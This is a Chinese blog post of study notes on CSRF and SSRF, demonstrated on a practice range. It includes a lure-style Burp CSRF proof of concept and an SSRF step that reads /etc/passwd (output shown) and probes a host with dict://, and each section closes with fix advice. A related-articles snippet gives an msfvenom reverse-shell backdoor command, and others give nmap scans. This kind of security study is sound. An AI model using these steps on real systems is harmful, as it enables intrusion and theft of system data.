Web安全攻防-----学习笔记(四)之CSRF与CSRF

最新推荐文章于 2024-05-04 20:29:53 发布
最新推荐文章于 2024-05-04 20:29:53 发布
阅读量321 收藏 1
点赞数
分类专栏: CSRF web 安全 文章标签: CSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxcsdn666/article/details/100714709
版权
web 同时被 3 个专栏收录
16 篇文章 0 订阅
订阅专栏
安全
16 篇文章 0 订阅
订阅专栏
CSRF
1 篇文章 0 订阅
订阅专栏

4.6 CSRF漏洞

CSRF(Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行也难以防范。

4.6.2 利用CSRF漏洞

一种理解:攻击者利用目标用户的身份,以目标用户的名义执行某些非法操作。

CSRF的攻击过程有以下两个重点:

  • 目标用户已经登录了网站,能够执行网站的功能
  • 目标用户访问了攻击者构造的URL

CSRF漏洞经常被用来制作蠕虫攻击、刷SEO流量(解释:https://wenda.so.com/q/1534477164214915?src=140)等。

以蠕虫攻击为例,利用Burp Suite抓包:

靶场:https://www.bihuoedu.com/vul/csrf/csrfget/csrf_get.php

注意:之前抓包火狐浏览器出现问题。。。。。耗费较长时间

抓包有:

右键--->Engagement tools--->General CSRF PoC,即为CSRF漏洞的测试代码,单击Copy Html

将代码发布到一个网站中,诱导模板用户访问,当目标用户处于登录状态,并且在同一浏览器访问了该网址后,目标用户就会自动修改信息。。。。

想到了之前 QQ空间多出的莫名说说。。。

4.6.5 CSRF漏洞修复建议

  • 1 验证请求的Referer值,如果Referer是以自己的网站开头的域名,则说明该请求来自网站自己是合法的。若是其他网站域名或空白,就有可能是CSRF攻击,则服务器一个拒绝请求。
  • 2 关键在于:在请求中放入攻击者不能伪造的信息。例如,在HTTP请求中以参数的形式加入一个随机产生的token,并在服务器端验证token。

4.7 SSRF漏洞

SSRF(Sever-Side Request Forgery,服务端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况,SSRF攻击的目标是外网无法访问的内部系统。

攻击者利用ssrf可以实现的攻击主要有5种:

  • 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息;
  • 2.攻击运行在内网或本地的应用程序(比如溢出);
  • 3.对内网web应用进行指纹识别,通过访问默认文件实现;
  • 4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli等);
  • 5.利用file协议读取本地文件等

4.7.3 SSRF漏洞利用

原理:形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制

目标:https://www.bihuoedu.com/vul/ssrf/ssrf_curl.php

先了解以下PHP中curl的用法:https://www.runoob.com/php/php-ref-curl.html

首先修改url:

说明211.149.128.208存在MySQL服务,再修改如下:

此时才是方向:。。首先利用 file:///etc/passwd

输出内容 :

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:999:997:User for polkitd:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin mysql:x:27:27::/dev/null:/sbin/nologin www:x:1000:1000::/dev/null:/sbin/nologin 1

上面已经获取信息

利用dict://211.149.128.208:22,

Gopher是一个互联网上使用的分布型的文件搜集获取网络协议。

4.7.5 漏洞修复建议

  • 限制请求的端口只能为web端口,只允许访问HTTP和HTTPS的请求
  • 限制不能访问内网的ip,以以防止对内网进行攻击
  • 屏蔽返回的详细信息

续:Web安全攻防-----学习笔记(四)之文件上传

家住海边就爱浪吖
关注
专栏目录
[网络安全自学篇] 八十三.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
CSRF(跨站请求伪造)
热门推荐
谢公子的博客
09-23 2万+
目录 CSRF分类 GET型: POST型: CSRF攻击原理及过程: CSRF攻击实例: CSRF攻击的防御: (1)验证 HTTP Referer 字段 (2)在请求地址中添加 token 并验证(Anti-CSRFtoken) (3)在 HTTP 头中自定义属性并验证 CSRF漏洞的挖掘 使用BurpSuite快速生成C...
Web系统csrf漏洞攻防
百里慕溪
06-03 4043
前言 csrf 漏洞是配合xss漏洞对web系统进行渗透攻击的,或者是攻击者构造一个恶意的请求,例如 http://www.test.com/help.html 如果目标 web 系统存在 csrf 漏洞,并且系统管理员已经登录,那么攻击者可以诱骗管理员点击 http://www.test.com/help.html这个链接,这时候攻击方相当于盗用了管理员的身份来进行操作,而且管理员丝毫未察觉,这个攻击就已经完成了,风险可想而知。 解决方案 可以对指向服务器的请求的请求头中的referer进行校验,.
CSRF漏洞检测与发现
weixin_39811856的博客
05-17 2692
1.首先明白什么是CSRF漏洞 跨站请求伪造,这里刚入门的同学肯定不明白是什么意思,其实重点在于请求伪造 简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。 在CSRF的攻击场景中攻击者会伪造一个请求(这个请.
使用burp生成CSRF的POC验证CSRF
bring_coco的博客
12-14 2912
实验环境:phpstudy, DVWA,burpsuite 演示过程: <1>使用burp代理提交内容 (代理推荐使用FoxyProxy小插件) <2>burp中寻找CSRF POC自动化生成选项 <3>可以看到如下为自动化生成POC 自动化编写有时候有些是不能用的,最好是自己改一些 <4>将HTML代码复制到新建的csrf.html中 <5>将其打开 <6>点击请求 可以看到成功改变密码。 这种方式虽然成功了,但是必须跟
burpsuite生成POC验证CSRF过程及原理
qq_41123867的博客
02-19 1万+
一.CSRF漏洞成因: 浏览器访问web服务器A,登录状态下,再用同一个浏览器访问了恶意服务器B,服务器B返回给浏览器的页面中含有要求访问服务器A的恶意代码,用户不知情的情况下点击后,导致服务器A接收到来自服务器B的通过浏览器发起的恶意请求 根据上图可知,要验证CSRF,需要在访问网站A后获得cookie后,再访问一个会返回恶意代码的网站B,返回的恶意代码必须能导致访问网站A ,如果能通过返回的...
WEB安全之:CSRF
f_carey的博客
07-04 202
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 CSRF1 简介1.1 CSRF 与 XSS 区别1.2 CSRF 的危害1.3 CSRF 产生的原因1.4 漏洞利用条件2 验证 CSRF2.1 验证环境2.2 搭建诱使点击网页2.3 诱使受害者点击3 Medium 级别4 防御策略 1 简介 CSRF 定义: 跨站请求伪造(英语:Cross-site re.
Web安全CSRF
chuxuezheerer的博客
01-20 380
CSRF 一.什么是CSRF 1.CSRF:Cross-site request forgery 跨站请求伪造 2.CSRF可以实施的前提: (1)CSRF利用站点对用户浏览器的信任 (2)被攻击网站依赖用户的身份认证 (3)网站信任已经验证过的用户 (4)攻击者使得用户的浏览器发送HTTP请求到目标网站 注意:攻击者利用的是浏览器会主动带上cookie这一原理,并没有从用户的磁盘下直接盗取用户的...
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
最新发布
2301_82242964的博客
05-04 644
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8007
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
web安全攻防渗透测试实战指南
weixin_67846882的博客
04-07 4987
1.Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
web安全攻防渗透测试实训笔记
m0_65385236的博客
04-07 1378
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
在 ASP.NET Web API 中启用跨域请求,防止跨站点请求伪造 (CSRF) 攻击
NARUTONEPIECE的博客
08-19 483
ASP.NET Web API 中启用跨域请求, 防止 ASP.NET 应用程序中的跨站点请求伪造 (CSRF) 攻击
Web开发框架安全问题及防范规范|之CSRF跨站请求伪造
weixin_30512043的博客
12-28 516
Web站点为什么会遭受攻击?是为了恶作剧?损害企业名誉?免费浏览收费内容?盗窃用户隐私信息?获取用户账号谋取私利?总之攻击方式层出不穷,作为Web开发框架来说,帮助开发者做好解决安全问题也是刻不容缓的,本篇文章来告诉大家怎么禁止CSRF跨站请求伪造。 WEb开发框架适用范围 Web网站 攻击原理 如果B/S开发框架中不做防范,完成一次CSRF跨站请求伪造,受害者必须依次完成两个步骤: 1...
Web安全CSRF总结
web工程师——小发发
03-17 561
一、CSRF是什么? CSRF(Cross-site request forgery)跨站请求伪造,是一种常见的web安全漏洞,概括地说就是指,攻击者通过浏览器保存的Cookie盗用了你的身份,以你的名义给某个网站发送恶意请求,这些恶意请求包括但不限于发邮件、修改账户信息、购买商品、转账等等,如果这个网站没有防御csrf攻击的话,那么这些恶意请求可能会请求成功,从而泄露了个人的隐私安全和财产安全。 二、CSRF的原理 浏览并登录受信网站WebA。 验证通过,浏览器端产生WebA的cookie。 用
CSRF攻击原理及防御
weixin_30485799的博客
03-22 426
一、CSRF攻击原理   CSRF是什么呢?CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性。想要深入理解CSRF的攻击特性我们有必要了解一下网站session的工作原理。  session我想大家都不陌生,无论你用.net或PHP开发过网站的都肯定用过session对象,然而session它是如何工作的呢?如...
计算机网络
qq_35630121的博客
09-04 368
CA认证原理 CA解决的是在https中,验证客户端收到的公钥是否为真的问题,为了防止中间人攻击。 CA的具体流程是: 客户端首先信任一些CA机构,并保存它们的公钥 在获取服务端公钥时,不向服务端索要,而是向CA索要 CA会发送给客户端两部分信息,一是服务端的公钥,名称,到期时间的明文,另一个是明文经过hash(减少签名长度)和CA私钥加密过的密文签名 客户端在收到签名后,会利用CA公钥对其进行解密,并对明文进行hash,如果二者的结果相同,则信任该服务端公钥 cookie,Session,token
Kali利用MSF渗透Win 7获取shell
舞指如歌~的博客
09-13 3411
首先在kali上制作一个后门程序,文件名为:setup.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=5050 -f exe -o setup.exe #本地监听地址及端口号:192.168.1.100:5050 为生成的文件 setup.exe 赋予可执行的权限,如果有必要可以对该文件执...
《白帽子讲Web安全》- CSRF深度解析与Apache Beam编程指南
首先,CSRF攻击之所以能够成功,关键在于浏览器会自动发送与当前页面所属域名匹配的Cookie到服务器。在描述中提到的例子中,攻击者创建了一个伪装的请求,因为用户的Session Cookie被浏览器正常发送,所以该请求在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值